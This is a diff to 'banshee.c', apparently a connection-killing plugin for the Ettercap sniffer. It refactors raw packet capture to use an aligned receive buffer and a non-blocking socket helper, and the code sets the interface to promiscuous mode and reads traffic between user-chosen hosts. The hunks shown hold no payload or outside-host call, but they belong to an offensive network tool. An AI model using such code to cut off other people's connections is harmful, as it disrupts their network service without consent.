@@ -17,12 +17,11 @@
     along with this program; if not, write to the Free Software
     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
-    $Id: banshee.c,v 1.7 2002/02/22 19:48:56 alor Exp $
+    $Id: banshee.c,v 1.8 2002/05/07 22:04:14 alor Exp $
 */
 
 #include <stdio.h>
 #include <unistd.h>
-#include <fcntl.h>
 #include <stdlib.h>
 
 #include "../../src/include/ec_main.h"
@@ -84,29 +83,23 @@ int banshee(void *dummy)
    int PS=0, PD=0;
    KILLING data;
    char c[1]="";
-   char *buf;
+   struct recv_packet recvpck;
    char cont[10];
 
 
-   if (!strcmp(Host_Source.ip, ""))
-   {
+   if (!strcmp(Host_Source.ip, "")) {
       Plugin_Output("\nEnter a source ip:port (0.0.0.0:0 for all): ");
       Plugin_Input(source, 25, P_BLOCK);
       sscanf(source, "%16[^:]:%d", source_ip, &PS);
-   }
-   else
-   {
+   } else {
       strlcpy(source_ip, Host_Source.ip, sizeof(source_ip));
    }
 
-   if (!strcmp(Host_Dest.ip, ""))
-   {
+   if (!strcmp(Host_Dest.ip, "")) {
       Plugin_Output("\nEnter a dest ip:port (0.0.0.0:0 for all): ");
       Plugin_Input(dest, 25, P_BLOCK);
       sscanf(dest, "%16[^:]:%d", dest_ip, &PD);
-   }
-   else
-   {
+   } else {
       strlcpy(dest_ip, Host_Dest.ip, sizeof(dest_ip));
    }
 
@@ -136,20 +129,21 @@ int banshee(void *dummy)
    if (Options.normal || number_of_connections == 0)  // form command line or in host list interface...
       Inet_SetPromisc(Options.netiface);
 
-   fcntl(sock,F_SETFL,O_NONBLOCK);
+   Inet_SetNonBlock(sock);
 
-   buf = Inet_Forge_packet( MTU );
+   recvpck.buf = Inet_Forge_packet( MTU + ALIGN_ETH_TO_WORD);
+   recvpck.aligned = recvpck.buf + ALIGN_ETH_TO_WORD;
 
    loop
    {
       memset(&data, 0, sizeof(KILLING));
-      memset(buf, 0, MTU);
+      memset(recvpck.aligned, 0, MTU);
 
-      len = Inet_GetRawPacket(sock, buf, MTU, NULL);
+      len = Inet_GetRawPacket(sock, recvpck.aligned, MTU, NULL);
 
       if (len > 0)
       {
-         eth = (ETH_header *)buf;
+         eth = (ETH_header *)recvpck.aligned;
 
          if ( ntohs(eth->type) == ETH_P_IP )
          {
@@ -214,7 +208,7 @@ int banshee(void *dummy)
       if (Plugin_Input(c, 1, P_NONBLOCK))
       {
          Plugin_Output("Exiting... \n");
-         Inet_Forge_packet_destroy( buf );
+         Inet_Forge_packet_destroy( recvpck.buf );
          Inet_CloseRawSock(sock);
          break;
       }
